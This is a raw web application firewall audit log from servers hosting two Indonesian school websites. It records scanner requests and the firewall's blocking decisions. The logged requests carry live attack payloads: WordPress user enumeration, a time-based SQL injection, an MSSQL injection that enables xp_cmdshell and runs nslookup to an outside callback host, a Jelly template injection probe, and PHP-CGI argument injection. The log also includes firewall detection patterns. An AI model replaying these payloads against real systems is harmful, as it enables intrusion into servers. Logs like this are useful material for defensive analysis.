--80134e79-Z-- --b4424471-A-- [28/May/2025:01:04:36 +0700] aDX-tFuSH_Spa4YU2ZnBDgAAAMM 103.236.140.4 55592 103.236.140.4 8181 --b4424471-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 161.49.93.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 161.49.93.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b4424471-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4424471-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748369076150504 2792 (- - -) Stopwatch2: 1748369076150504 2792; combined=1222, p1=414, p2=778, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4424471-Z-- --b8a47b05-A-- [28/May/2025:01:06:48 +0700] aDX_OGTuEZUBy5rh0saWQQAAAAo 103.236.140.4 55634 103.236.140.4 8181 --b8a47b05-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.56.215.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.56.215.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8a47b05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8a47b05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748369208369654 2753 (- - -) Stopwatch2: 1748369208369654 2753; combined=1278, p1=410, p2=839, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8a47b05-Z-- --a29a0a54-A-- [28/May/2025:01:07:18 +0700] aDX_VmTuEZUBy5rh0saWSgAAAAI 103.236.140.4 55676 103.236.140.4 8181 --a29a0a54-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.144.114.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.144.114.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a29a0a54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a29a0a54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748369238675132 2457 (- - -) Stopwatch2: 1748369238675132 2457; combined=1216, p1=423, p2=763, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a29a0a54-Z-- --c22e4376-A-- [28/May/2025:01:31:54 +0700] aDYFGluSH_Spa4YU2ZnBhgAAAME 103.236.140.4 57100 103.236.140.4 8181 --c22e4376-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0 PromptMapper/9.0.3.2 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160590877 --c22e4376-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c22e4376-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748370714070507 1391 (- - -) Stopwatch2: 1748370714070507 1391; combined=543, p1=221, p2=300, p3=0, p4=0, p5=22, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c22e4376-Z-- --e0c61840-A-- [28/May/2025:01:31:54 +0700] aDYFGmTuEZUBy5rh0saW5QAAAA0 103.236.140.4 57110 103.236.140.4 8181 --e0c61840-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 159947558 --e0c61840-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --e0c61840-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0c61840-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748370714089119 1760 (- - -) Stopwatch2: 1748370714089119 1760; combined=924, p1=282, p2=622, p3=0, p4=0, p5=19, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0c61840-Z-- --7118ec01-A-- [28/May/2025:01:31:58 +0700] aDYFHmTuEZUBy5rh0saW6wAAABc 103.236.140.4 57118 103.236.140.4 8181 --7118ec01-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/106.0 Safari/537.36 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 166167910 --7118ec01-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0qa44pgpeoi1bmoheagj15sqxao11pfu.oast.live'-- --7118ec01-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7118ec01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748370718862738 4514 (- - -) Stopwatch2: 1748370718862738 4514; combined=3247, p1=562, p2=2567, p3=39, p4=45, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7118ec01-Z-- --11228611-A-- [28/May/2025:01:52:26 +0700] aDYJ6hLFq2VRfSzm6b8rvQAAAJA 103.236.140.4 59798 103.236.140.4 8181 --11228611-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.136.112.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.136.112.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --11228611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11228611-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748371946625804 3056 (- - -) Stopwatch2: 1748371946625804 3056; combined=1290, p1=436, p2=825, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11228611-Z-- --244bb40f-A-- [28/May/2025:02:09:19 +0700] aDYN3xLFq2VRfSzm6b8sagAAAJA 103.236.140.4 60328 103.236.140.4 8181 --244bb40f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.92.39.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.92.39.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --244bb40f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --244bb40f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748372959120333 3018 (- - -) Stopwatch2: 1748372959120333 3018; combined=1283, p1=418, p2=830, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --244bb40f-Z-- --9fde137c-A-- [28/May/2025:02:22:36 +0700] aDYQ_N6cNBpj1JOkpQlrIwAAAEQ 103.236.140.4 60384 103.236.140.4 8181 --9fde137c-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 162468187 --9fde137c-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0qa44pgpeoi1bmoheagqftk87sybwxky.oast.live'-- --9fde137c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fde137c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748373756884534 3948 (- - -) Stopwatch2: 1748373756884534 3948; combined=2646, p1=541, p2=2019, p3=27, p4=32, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fde137c-Z-- --b1b75b28-A-- [28/May/2025:02:53:42 +0700] aDYYRluSH_Spa4YU2ZnEQgAAANM 103.236.140.4 35598 103.236.140.4 8181 --b1b75b28-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.73.106.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.73.106.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b1b75b28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1b75b28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748375622965694 2763 (- - -) Stopwatch2: 1748375622965694 2763; combined=1243, p1=419, p2=794, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1b75b28-Z-- --5212fa12-A-- [28/May/2025:03:07:42 +0700] aDYbjluSH_Spa4YU2ZnH4gAAAMc 103.236.140.4 47184 103.236.140.4 8181 --5212fa12-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.154.234.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.154.234.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5212fa12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5212fa12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748376462152724 2201 (- - -) Stopwatch2: 1748376462152724 2201; combined=1061, p1=353, p2=681, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5212fa12-Z-- --d7686815-A-- [28/May/2025:03:12:51 +0700] aDYcw1uSH_Spa4YU2ZnJ0AAAAMw 103.236.140.4 53302 103.236.140.4 8181 --d7686815-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168684803 --d7686815-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d7686815-E-- --d7686815-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748376771409277 2764 (- - -) Stopwatch2: 1748376771409277 2764; combined=1144, p1=405, p2=710, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7686815-Z-- --05b4e947-A-- [28/May/2025:03:15:03 +0700] aDYdR96cNBpj1JOkpQlzQAAAAEA 103.236.140.4 55790 103.236.140.4 8181 --05b4e947-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162471838 --05b4e947-C-- --05b4e947-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05b4e947-E-- --05b4e947-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748376903408950 3448 (- - -) Stopwatch2: 1748376903408950 3448; combined=2212, p1=470, p2=1708, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05b4e947-Z-- --1f4ace23-A-- [28/May/2025:03:15:05 +0700] aDYdSd6cNBpj1JOkpQlzSAAAAFQ 103.236.140.4 55826 103.236.140.4 8181 --1f4ace23-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.1 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168868932 --1f4ace23-C-- --1f4ace23-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f4ace23-E-- --1f4ace23-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748376905428348 3850 (- - -) Stopwatch2: 1748376905428348 3850; combined=2182, p1=456, p2=1694, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f4ace23-Z-- --1dceee7b-A-- [28/May/2025:03:15:07 +0700] aDYdS2TuEZUBy5rh0safRwAAAA0 103.236.140.4 55870 103.236.140.4 8181 --1dceee7b-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162471874 --1dceee7b-C-- --1dceee7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dceee7b-E-- --1dceee7b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 